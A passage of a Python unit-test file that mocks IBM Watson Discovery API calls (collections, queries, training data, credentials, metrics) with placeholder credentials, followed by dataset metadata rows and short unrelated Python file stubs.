content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.create_collection(environment_id='envid',
name="name",
description="",
language="",
configuration_id='confid')
discovery.create_collection(environment_id='envid',
name="name",
language="es",
description="")
discovery.get_collection('envid', 'collid')
called_url = urlparse(responses.calls[2].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
discovery.delete_collection(environment_id='envid',
collection_id='collid')
discovery.list_collection_fields(environment_id='envid',
collection_id='collid')
assert len(responses.calls) == 5
@responses.activate
def test_federated_query():
discovery_url = urljoin(base_discovery_url,
'environments/envid/query')
responses.add(responses.GET, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.federated_query('envid', ['collid1', 'collid2'], filter='colls.sha1::9181d244*')
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_federated_query_notices():
discovery_url = urljoin(base_discovery_url,
'environments/envid/notices')
responses.add(responses.GET, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.federated_query_notices('envid', ['collid1', 'collid2'], filter='notices.sha1::9181d244*')
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_query():
discovery_url = urljoin(base_discovery_url,
'environments/envid/collections/collid/query')
responses.add(responses.GET, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.query('envid', 'collid',
filter='extracted_metadata.sha1::9181d244*',
count=1,
passages=True,
passages_fields=['x', 'y'],
logging_opt_out='True',
passages_count=2)
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_query_relations():
discovery_url = urljoin(
base_discovery_url,
'environments/envid/collections/collid/query_relations')
responses.add(
responses.POST,
discovery_url,
body="{\"body\": \"hello\"}",
status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1(
'2016-11-07', username='username', password='password')
discovery.query_relations('envid', 'collid', count=10)
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_query_entities():
discovery_url = urljoin(
base_discovery_url,
'environments/envid/collections/collid/query_entities')
responses.add(
responses.POST,
discovery_url,
body="{\"body\": \"hello\"}",
status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1(
'2016-11-07', username='username', password='password')
discovery.query_entities('envid', 'collid', {'count': 10})
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_query_notices():
discovery_url = urljoin(
base_discovery_url,
'environments/envid/collections/collid/notices')
responses.add(
responses.GET,
discovery_url,
body="{\"body\": \"hello\"}",
status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1(
'2016-11-07', username='username', password='password')
discovery.query_notices('envid', 'collid', filter='notices.sha1::*')
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_configs():
discovery_url = urljoin(base_discovery_url,
'environments/envid/configurations')
discovery_config_id = urljoin(base_discovery_url,
'environments/envid/configurations/confid')
results = {"configurations":
[{"name": "Default Configuration",
"configuration_id": "confid"}]}
responses.add(responses.GET, discovery_url,
body=json.dumps(results),
status=200,
content_type='application/json')
responses.add(responses.GET, discovery_config_id,
body=json.dumps(results['configurations'][0]),
status=200,
content_type='application/json')
responses.add(responses.POST, discovery_url,
body=json.dumps(results['configurations'][0]),
status=200,
content_type='application/json')
responses.add(responses.PUT, discovery_config_id,
body=json.dumps(results['configurations'][0]),
status=200,
content_type='application/json')
responses.add(responses.DELETE, discovery_config_id,
body=json.dumps({'deleted': 'bogus -- ok'}),
status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.list_configurations(environment_id='envid')
discovery.get_configuration(environment_id='envid',
configuration_id='confid')
assert len(responses.calls) == 2
discovery.create_configuration(environment_id='envid',
name='my name')
discovery.create_configuration(environment_id='envid',
name='my name',
source={'type': 'salesforce', 'credential_id': 'xxx'})
discovery.update_configuration(environment_id='envid',
configuration_id='confid',
name='my new name')
discovery.update_configuration(environment_id='envid',
configuration_id='confid',
name='my new name',
source={'type': 'salesforce', 'credential_id': 'xxx'})
discovery.delete_configuration(environment_id='envid',
configuration_id='confid')
assert len(responses.calls) == 7
@responses.activate
def test_document():
discovery_url = urljoin(base_discovery_url,
'environments/envid/preview')
config_url = urljoin(base_discovery_url,
'environments/envid/configurations')
responses.add(responses.POST, discovery_url,
body="{\"configurations\": []}",
status=200,
content_type='application/json')
responses.add(responses.GET, config_url,
body=json.dumps({"configurations":
[{"name": "Default Configuration",
"configuration_id": "confid"}]}),
status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
html_path = os.path.join(os.getcwd(), 'resources', 'simple.html')
with open(html_path) as fileinfo:
conf_id = discovery.test_configuration_in_environment(environment_id='envid',
configuration_id='bogus',
file=fileinfo)
assert conf_id is not None
conf_id = discovery.test_configuration_in_environment(environment_id='envid',
file=fileinfo)
assert conf_id is not None
assert len(responses.calls) == 2
add_doc_url = urljoin(base_discovery_url,
'environments/envid/collections/collid/documents')
doc_id_path = 'environments/envid/collections/collid/documents/docid'
update_doc_url = urljoin(base_discovery_url, doc_id_path)
del_doc_url = urljoin(base_discovery_url,
doc_id_path)
responses.add(responses.POST, add_doc_url,
body="{\"body\": []}",
status=200,
content_type='application/json')
doc_status = {
"document_id": "45556e23-f2b1-449d-8f27-489b514000ff",
"configuration_id": "2e079259-7dd2-40a9-998f-3e716f5a7b88",
"created" : "2016-06-16T10:56:54.957Z",
"updated" : "2017-05-16T13:56:54.957Z",
"status": "available",
"status_description": "Document is successfully ingested and indexed with no warnings",
"notices": []
}
responses.add(responses.GET, del_doc_url,
body=json.dumps(doc_status),
status=200,
content_type='application/json')
responses.add(responses.POST, update_doc_url,
body="{\"body\": []}",
status=200,
content_type='application/json')
responses.add(responses.DELETE, del_doc_url,
body="{\"body\": []}",
status=200,
content_type='application/json')
html_path = os.path.join(os.getcwd(), 'resources', 'simple.html')
with open(html_path) as fileinfo:
conf_id = discovery.add_document(environment_id='envid',
collection_id='collid',
file=fileinfo)
assert conf_id is not None
assert len(responses.calls) == 3
discovery.get_document_status(environment_id='envid',
collection_id='collid',
document_id='docid')
assert len(responses.calls) == 4
discovery.update_document(environment_id='envid',
collection_id='collid',
document_id='docid')
assert len(responses.calls) == 5
discovery.update_document(environment_id='envid',
collection_id='collid',
document_id='docid')
assert len(responses.calls) == 6
discovery.delete_document(environment_id='envid',
collection_id='collid',
document_id='docid')
assert len(responses.calls) == 7
conf_id = discovery.add_document(environment_id='envid',
collection_id='collid',
file=io.StringIO(u'my string of file'),
filename='file.txt')
assert len(responses.calls) == 8
conf_id = discovery.add_document(environment_id='envid',
collection_id='collid',
file=io.StringIO(u'<h1>my string of file</h1>'),
filename='file.html',
file_content_type='application/html')
assert len(responses.calls) == 9
conf_id = discovery.add_document(environment_id='envid',
collection_id='collid',
file=io.StringIO(u'<h1>my string of file</h1>'),
filename='file.html',
file_content_type='application/html',
metadata=io.StringIO(u'{"stuff": "woot!"}'))
assert len(responses.calls) == 10
@responses.activate
def test_delete_all_training_data():
training_endpoint = '/v1/environments/{0}/collections/{1}/training_data'
endpoint = training_endpoint.format(environment_id, collection_id)
url = '{0}{1}'.format(base_url, endpoint)
responses.add(responses.DELETE, url, status=204)
service = watson_developer_cloud.DiscoveryV1(version,
username='username',
password='password')
response = service.delete_all_training_data(environment_id=environment_id,
collection_id=collection_id).get_result()
assert response is None
@responses.activate
def test_list_training_data():
training_endpoint = '/v1/environments/{0}/collections/{1}/training_data'
endpoint = training_endpoint.format(environment_id, collection_id)
url = '{0}{1}'.format(base_url, endpoint)
mock_response = {
"environment_id": "string",
"collection_id": "string",
"queries": [
{
"query_id": "string",
"natural_language_query": "string",
"filter": "string",
"examples": [
{
"document_id": "string",
"cross_reference": "string",
"relevance": 0
}
]
}
]
}
responses.add(responses.GET,
url,
body=json.dumps(mock_response),
status=200,
content_type='application/json')
service = watson_developer_cloud.DiscoveryV1(version,
username='username',
password='password')
response = service.list_training_data(environment_id=environment_id,
collection_id=collection_id).get_result()
assert response == mock_response
# Verify that response can be converted to a TrainingDataSet
TrainingDataSet._from_dict(response)
@responses.activate
def test_add_training_data():
training_endpoint = '/v1/environments/{0}/collections/{1}/training_data'
endpoint = training_endpoint.format(environment_id, collection_id)
url = '{0}{1}'.format(base_url, endpoint)
natural_language_query = "why is the sky blue"
filter = "text:meteorology"
examples = [
{
"document_id": "54f95ac0-3e4f-4756-bea6-7a67b2713c81",
"relevance": 1
},
{
"document_id": "01bcca32-7300-4c9f-8d32-33ed7ea643da",
"cross_reference": "my_id_field:1463",
"relevance": 5
}
]
mock_response = {
"query_id": "string",
"natural_language_query": "string",
"filter": "string",
"examples": [
{
"document_id": "string",
"cross_reference": "string",
"relevance": 0
}
]
}
responses.add(responses.POST,
url,
body=json.dumps(mock_response),
status=200,
content_type='application/json')
service = watson_developer_cloud.DiscoveryV1(version,
username='username',
password='password')
response = service.add_training_data(
environment_id=environment_id,
collection_id=collection_id,
natural_language_query=natural_language_query,
filter=filter,
examples=examples).get_result()
assert response == mock_response
# Verify that response can be converted to a TrainingQuery
TrainingQuery._from_dict(response)
@responses.activate
def test_delete_training_data():
training_endpoint = '/v1/environments/{0}/collections/{1}/training_data/{2}'
query_id = 'queryid'
endpoint = training_endpoint.format(
environment_id, collection_id, query_id)
url = '{0}{1}'.format(base_url, endpoint)
responses.add(responses.DELETE, url, status=204)
service = watson_developer_cloud.DiscoveryV1(version,
username='username',
password='password')
response = service.delete_training_data(environment_id=environment_id,
collection_id=collection_id,
query_id=query_id).get_result()
assert response is None
@responses.activate
def test_get_training_data():
training_endpoint = '/v1/environments/{0}/collections/{1}/training_data/{2}'
query_id = 'queryid'
endpoint = training_endpoint.format(
environment_id, collection_id, query_id)
url = '{0}{1}'.format(base_url, endpoint)
mock_response = {
"query_id": "string",
"natural_language_query": "string",
"filter": "string",
"examples": [
{
"document_id": "string",
"cross_reference": "string",
"relevance": 0
}
]
}
responses.add(responses.GET,
url,
body=json.dumps(mock_response),
status=200,
content_type='application/json')
service = watson_developer_cloud.DiscoveryV1(version,
username='username',
password='password')
response = service.get_training_data(environment_id=environment_id,
collection_id=collection_id,
query_id=query_id).get_result()
assert response == mock_response
# Verify that response can be converted to a TrainingQuery
TrainingQuery._from_dict(response)
@responses.activate
def test_create_training_example():
examples_endpoint = '/v1/environments/{0}/collections/{1}/training_data' + \
'/{2}/examples'
query_id = 'queryid'
endpoint = examples_endpoint.format(
environment_id, collection_id, query_id)
url = '{0}{1}'.format(base_url, endpoint)
document_id = "string"
relevance = 0
cross_reference = "string"
mock_response = {
"document_id": "string",
"cross_reference": "string",
"relevance": 0
}
responses.add(responses.POST,
url,
body=json.dumps(mock_response),
status=201,
content_type='application/json')
service = watson_developer_cloud.DiscoveryV1(version,
username='username',
password='password')
response = service.create_training_example(
environment_id=environment_id,
collection_id=collection_id,
query_id=query_id,
document_id=document_id,
relevance=relevance,
cross_reference=cross_reference).get_result()
assert response == mock_response
# Verify that response can be converted to a TrainingExample
TrainingExample._from_dict(response)
@responses.activate
def test_delete_training_example():
examples_endpoint = '/v1/environments/{0}/collections/{1}/training_data' + \
'/{2}/examples/{3}'
query_id = 'queryid'
example_id = 'exampleid'
endpoint = examples_endpoint.format(environment_id,
collection_id,
query_id,
example_id)
url = '{0}{1}'.format(base_url, endpoint)
responses.add(responses.DELETE, url, status=204)
service = watson_developer_cloud.DiscoveryV1(version,
username='username',
password='password')
response = service.delete_training_example(
environment_id=environment_id,
collection_id=collection_id,
query_id=query_id,
example_id=example_id).get_result()
assert response is None
@responses.activate
def test_get_training_example():
examples_endpoint = '/v1/environments/{0}/collections/{1}/training_data' + \
'/{2}/examples/{3}'
query_id = 'queryid'
example_id = 'exampleid'
endpoint = examples_endpoint.format(environment_id,
collection_id,
query_id,
example_id)
url = '{0}{1}'.format(base_url, endpoint)
mock_response = {
"document_id": "string",
"cross_reference": "string",
"relevance": 0
}
responses.add(responses.GET,
url,
body=json.dumps(mock_response),
status=200,
content_type='application/json')
service = watson_developer_cloud.DiscoveryV1(version,
username='username',
password='password')
response = service.get_training_example(
environment_id=environment_id,
collection_id=collection_id,
query_id=query_id,
example_id=example_id).get_result()
assert response == mock_response
# Verify that response can be converted to a TrainingExample
TrainingExample._from_dict(response)
@responses.activate
def test_update_training_example():
examples_endpoint = '/v1/environments/{0}/collections/{1}/training_data' + \
'/{2}/examples/{3}'
query_id = 'queryid'
example_id = 'exampleid'
endpoint = examples_endpoint.format(environment_id,
collection_id,
query_id,
example_id)
url = '{0}{1}'.format(base_url, endpoint)
relevance = 0
cross_reference = "string"
mock_response = {
"document_id": "string",
"cross_reference": "string",
"relevance": 0
}
responses.add(responses.PUT,
url,
body=json.dumps(mock_response),
status=200,
content_type='application/json')
service = watson_developer_cloud.DiscoveryV1(version,
username='username',
password='password')
response = service.update_training_example(
environment_id=environment_id,
collection_id=collection_id,
query_id=query_id,
example_id=example_id,
relevance=relevance,
cross_reference=cross_reference).get_result()
assert response == mock_response
# Verify that response can be converted to a TrainingExample
TrainingExample._from_dict(response)
@responses.activate
def test_expansions():
url = 'https://gateway.watsonplatform.net/discovery/api/v1/environments/envid/collections/colid/expansions'
responses.add(
responses.GET,
url,
body='{"expansions": "results"}',
status=200,
content_type='application_json')
responses.add(
responses.DELETE,
url,
body='{"description": "success" }',
status=200,
content_type='application_json')
responses.add(
responses.POST,
url,
body='{"expansions": "success" }',
status=200,
content_type='application_json')
discovery = watson_developer_cloud.DiscoveryV1('2017-11-07', username="username", password="password")
discovery.list_expansions('envid', 'colid')
assert responses.calls[0].response.json() == {"expansions": "results"}
discovery.create_expansions('envid', 'colid', [{"input_terms": "dumb", "expanded_terms": "dumb2"}])
assert responses.calls[1].response.json() == {"expansions": "success"}
discovery.delete_expansions('envid', 'colid')
assert responses.calls[2].response.json() == {"description": "success"}
assert len(responses.calls) == 3
@responses.activate
def test_delete_user_data():
url = 'https://gateway.watsonplatform.net/discovery/api/v1/user_data'
responses.add(
responses.DELETE,
url,
body='{"description": "success" }',
status=204,
content_type='application_json')
discovery = watson_developer_cloud.DiscoveryV1('2017-11-07', username="username", password="password")
response = discovery.delete_user_data('id').get_result()
assert response is None
assert len(responses.calls) == 1
@responses.activate
def test_credentials():
discovery_credentials_url = urljoin(base_discovery_url, 'environments/envid/credentials')
results = {'credential_id': 'e68305ce-29f3-48ea-b829-06653ca0fdef',
'source_type': 'salesforce',
'credential_details': {
'url': 'https://login.salesforce.com',
'credential_type': 'username_password',
'username':'user@email.com'}
}
iam_url = "https://iam.bluemix.net/identity/token"
iam_token_response = """{
"access_token": "oAeisG8yqPY7sFR_x66Z15",
"token_type": "Bearer",
"expires_in": 3600,
"expiration": 1524167011,
"refresh_token": "jy4gl91BQ"
}"""
responses.add(responses.POST, url=iam_url, body=iam_token_response, status=200)
responses.add(responses.GET, "{0}/{1}?version=2016-11-07".format(discovery_credentials_url, 'credential_id'),
body=json.dumps(results),
status=200,
content_type='application/json')
responses.add(responses.GET, "{0}?version=2016-11-07".format(discovery_credentials_url),
body=json.dumps([results]),
status=200,
content_type='application/json')
responses.add(responses.POST, "{0}?version=2016-11-07".format(discovery_credentials_url),
body=json.dumps(results),
status=200,
content_type='application/json')
results['source_type'] = 'ibm'
responses.add(responses.PUT, "{0}/{1}?version=2016-11-07".format(discovery_credentials_url, 'credential_id'),
body=json.dumps(results),
status=200,
content_type='application/json')
responses.add(responses.DELETE, "{0}/{1}?version=2016-11-07".format(discovery_credentials_url, 'credential_id'),
body=json.dumps({'deleted': 'bogus -- ok'}),
status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
iam_apikey='iam_apikey')
discovery.create_credentials('envid', 'salesforce', {
'url': 'https://login.salesforce.com',
'credential_type': 'username_password',
'username':'user@email.com'
})
discovery.get_credentials('envid', 'credential_id')
discovery.update_credentials(environment_id='envid',
credential_id='credential_id',
source_type='salesforce',
credential_details=results['credential_details'])
discovery.list_credentials('envid')
discovery.delete_credentials(environment_id='envid', credential_id='credential_id')
assert len(responses.calls) == 10
@responses.activate
def test_events_and_feedback():
discovery_event_url = urljoin(base_discovery_url, 'events')
discovery_metrics_event_rate_url = urljoin(base_discovery_url, 'metrics/event_rate')
discovery_metrics_query_url = urljoin(base_discovery_url, 'metrics/number_of_queries')
discovery_metrics_query_event_url = urljoin(base_discovery_url, 'metrics/number_of_queries_with_event')
discovery_metrics_query_no_results_url = urljoin(base_discovery_url, 'metrics/number_of_queries_with_no_search_results')
discovery_metrics_query_token_event_url = urljoin(base_discovery_url, 'metrics/top_query_tokens_with_event_rate')
discovery_query_log_url = urljoin(base_discovery_url, 'logs')
event_data = {
"environment_id": "xxx",
"session_token": "yyy",
"client_timestamp": "2018-08-14T14:39:59.268Z",
"display_rank": 0,
"collection_id": "abc",
"document_id": "xyz",
"query_id": "cde"
}
create_event_response = {
"type": "click",
"data": event_data
}
metric_response = {
"aggregations": [
{
"interval": "1d",
"event_type": "click",
"results": [
{
"key_as_string": "2018-08-14T14:39:59.309Z",
"key": 1533513600000,
"matching_results": 2,
"event_rate": 0.0
}
]
}
]
}
metric_token_response = {
"aggregations": [
{
"event_type": "click",
"results": [
{
"key": "content",
"matching_results": 5,
"event_rate": 0.6
},
{
"key": "first",
"matching_results": 5,
"event_rate": 0.6
},
{
"key": "of",
"matching_results": 5,
"event_rate": 0.6
}
]
}
]
}
log_query_response = {
"matching_results": 20,
"results": [
{
"customer_id": "",
"environment_id": "xxx",
"natural_language_query": "The content of the first chapter",
"query_id": "1ICUdh3Pab",
"document_results": {
"count": 1,
"results": [
{
"collection_id": "b67a82f3-6507-4c25-9757-3485ff4f2a32",
"score": 0.025773458,
"position": 10,
"document_id": "af0be20e-e130-4712-9a2e-37d9c8b9c52f"
}
]
},
"event_type": "query",
"session_token": "1_nbEfQtKVcg9qx3t41ICUdh3Pab",
"created_timestamp": "2018-08-14T18:20:30.460Z"
}
]
}
iam_url = "https://iam.bluemix.net/identity/token"
iam_token_response = """{
"access_token": "oAeisG8yqPY7sFR_x66Z15",
"token_type": "Bearer",
"expires_in": 3600,
"expiration": 1524167011,
"refresh_token": "jy4gl91BQ"
}"""
responses.add(responses.POST, url=iam_url, body=iam_token_response, status=200)
responses.add(responses.POST, "{0}?version=2016-11-07".format(discovery_event_url),
body=json.dumps(create_event_response),
status=200,
content_type='application/json')
responses.add(responses.GET, "{0}?version=2016-11-07".format(discovery_metrics_event_rate_url),
body=json.dumps(metric_response),
status=200,
content_type='application/json')
responses.add(responses.GET, "{0}?version=2016-11-07".format(discovery_metrics_query_url),
body=json.dumps(metric_response),
status=200,
content_type='application/json')
responses.add(responses.GET, "{0}?version=2016-11-07".format(discovery_metrics_query_event_url),
body=json.dumps(metric_response),
status=200,
content_type='application/json')
responses.add(responses.GET, "{0}?version=2016-11-07".format(discovery_metrics_query_no_results_url),
body=json.dumps(metric_response),
status=200,
content_type='application/json')
responses.add(responses.GET, "{0}?version=2016-11-07".format(discovery_metrics_query_token_event_url),
body=json.dumps(metric_token_response),
status=200,
content_type='application/json')
responses.add(responses.GET, "{0}?version=2016-11-07".format(discovery_query_log_url),
body=json.dumps(log_query_response),
status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
iam_apikey='iam_apikey')
discovery.create_event('click', event_data)
assert responses.calls[1].response.json()["data"] == event_data
discovery.get_metrics_event_rate('2018-08-13T14:39:59.309Z',
'2018-08-14T14:39:59.309Z',
'document')
assert responses.calls[3].response.json() == metric_response
discovery.get_metrics_query('2018-08-13T14:39:59.309Z',
'2018-08-14T14:39:59.309Z',
'document')
assert responses.calls[5].response.json() == metric_response
discovery.get_metrics_query_event('2018-08-13T14:39:59.309Z',
'2018-08-14T14:39:59.309Z',
'document')
assert responses.calls[7].response.json() == metric_response
discovery.get_metrics_query_no_results('2018-08-13T14:39:59.309Z',
'2018-08-14T14:39:59.309Z',
'document')
assert responses.calls[9].response.json() == metric_response
discovery.get_metrics_query_token_event(2)
assert responses.calls[11].response.json() == metric_token_response
discovery.query_log()
assert responses.calls[13].response.json() == log_query_response
assert len(responses.calls) == 14
| 38.394667 | 124 | 0.561467 | 4,076 | 43,194 | 5.714671 | 0.083415 | 0.038123 | 0.049586 | 0.055811 | 0.834543 | 0.809986 | 0.785687 | 0.758468 | 0.717726 | 0.679475 | 0 | 0.039955 | 0.327268 | 43,194 | 1,124 | 125 | 38.428826 | 0.761649 | 0.008404 | 0 | 0.642173 | 0 | 0.001065 | 0.195316 | 0.057633 | 0 | 0 | 0 | 0 | 0.074547 | 1 | 0.029819 | false | 0.033014 | 0.009585 | 0 | 0.039404 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aedc787aa97030d8f7e06766db9c1d56efbfd2e7 | 50 | py | Python | utils/models/mednet/__init__.py | bhklab/ptl-oar-segmentation | 354c3ee7f042a025f74e210a7b8462beac9b727d | [
"Apache-2.0"
] | 3 | 2022-01-18T19:25:46.000Z | 2022-02-05T18:53:24.000Z | utils/models/mednet/__init__.py | bhklab/ptl-oar-segmentation | 354c3ee7f042a025f74e210a7b8462beac9b727d | [
"Apache-2.0"
] | null | null | null | utils/models/mednet/__init__.py | bhklab/ptl-oar-segmentation | 354c3ee7f042a025f74e210a7b8462beac9b727d | [
"Apache-2.0"
] | null | null | null | from .model import ResNetMed3D, generate_resnet3d
| 25 | 49 | 0.86 | 6 | 50 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044444 | 0.1 | 50 | 1 | 50 | 50 | 0.888889 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aee88a4a34f7144d332e64bec192000ba1dd558c | 75 | py | Python | aspirelt/web.py | Constructionware/aspireLight | 352f6c29d8656fd2ab94d26af930f7e6f08107eb | [
"MIT"
] | 1 | 2022-01-20T04:15:27.000Z | 2022-01-20T04:15:27.000Z | aspirelt/web.py | Constructionware/aspireLight | 352f6c29d8656fd2ab94d26af930f7e6f08107eb | [
"MIT"
] | null | null | null | aspirelt/web.py | Constructionware/aspireLight | 352f6c29d8656fd2ab94d26af930f7e6f08107eb | [
"MIT"
] | null | null | null |
from aspire.responder import Request, Response
from aspire.cli import cli
| 18.75 | 46 | 0.826667 | 11 | 75 | 5.636364 | 0.636364 | 0.322581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 75 | 3 | 47 | 25 | 0.953846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aef8fd6aaaa32b43da38cdfd1492062ad0ce013f | 1,067 | py | Python | venv/lib/python2.7/UserDict.py | sunlum/Deep-Semantic-Space-NST | 468ac2590385f48e65df12c1a3c9db0ed8d49477 | [
"MIT"
] | null | null | null | venv/lib/python2.7/UserDict.py | sunlum/Deep-Semantic-Space-NST | 468ac2590385f48e65df12c1a3c9db0ed8d49477 | [
"MIT"
] | null | null | null | venv/lib/python2.7/UserDict.py | sunlum/Deep-Semantic-Space-NST | 468ac2590385f48e65df12c1a3c9db0ed8d49477 | [
"MIT"
] | null | null | null | XSym
0036
abe4795be07b15cd20865ad8b8bcbc67
/anaconda2/lib/python2.7/UserDict.py
| 213.4 | 987 | 0.065604 | 9 | 1,067 | 7.777778 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.315789 | 0.928772 | 1,067 | 5 | 987 | 213.4 | 0.605263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d198cfde5cdb658ad9f981722e28454bb7558acd | 113 | py | Python | tests/contrib/django/models.py | ascan-io/raven-python | 5b3f48c66269993a0202cfc988750e5fe66e0c00 | [
"BSD-3-Clause"
] | 1,108 | 2015-01-02T01:20:00.000Z | 2022-03-09T02:22:40.000Z | tests/contrib/django/models.py | nvllsvm/raven-python | c4403f21973138cd20cf9c005da4fb934836d76e | [
"BSD-3-Clause"
] | 698 | 2015-01-04T11:12:57.000Z | 2022-01-22T08:07:51.000Z | tests/contrib/django/models.py | nvllsvm/raven-python | c4403f21973138cd20cf9c005da4fb934836d76e | [
"BSD-3-Clause"
] | 486 | 2015-01-04T09:00:33.000Z | 2022-03-09T02:37:18.000Z | from __future__ import absolute_import
from django.db import models
class MyTestModel(models.Model):
pass
| 14.125 | 38 | 0.79646 | 15 | 113 | 5.666667 | 0.733333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159292 | 113 | 7 | 39 | 16.142857 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
d1ed2c242ae5136ef994c040564a36738c2095c1 | 332 | py | Python | djangomaster/master/__init__.py | kpekepoh/django-aww | f18dc11474b856bd70bb8dbc3acf39be6ea881d0 | [
"MIT"
] | null | null | null | djangomaster/master/__init__.py | kpekepoh/django-aww | f18dc11474b856bd70bb8dbc3acf39be6ea881d0 | [
"MIT"
] | 7 | 2015-01-19T07:25:33.000Z | 2015-01-20T02:04:34.000Z | djangomaster/master/__init__.py | kpekepoh/django-aww | f18dc11474b856bd70bb8dbc3acf39be6ea881d0 | [
"MIT"
] | null | null | null | from djangomaster.master.home import HomeView, SettingsView
from djangomaster.master.routes import RoutesView
from djangomaster.master.signals import SignalsView
from djangomaster.master.templatetags import TemplateTagsView
from djangomaster.master.migrations import MigrationsView
from djangomaster.master.models import ModelsView
| 47.428571 | 61 | 0.885542 | 37 | 332 | 7.945946 | 0.459459 | 0.326531 | 0.44898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075301 | 332 | 6 | 62 | 55.333333 | 0.957655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ae54fb6cd346a59f9c8ea069c07903a67d6b9cd7 | 32 | py | Python | __init__.py | Brayneded/vcoclient | 1a02231453adc1653f7ce2f4815c0129e6b932ed | [
"MIT"
] | null | null | null | __init__.py | Brayneded/vcoclient | 1a02231453adc1653f7ce2f4815c0129e6b932ed | [
"MIT"
] | null | null | null | __init__.py | Brayneded/vcoclient | 1a02231453adc1653f7ce2f4815c0129e6b932ed | [
"MIT"
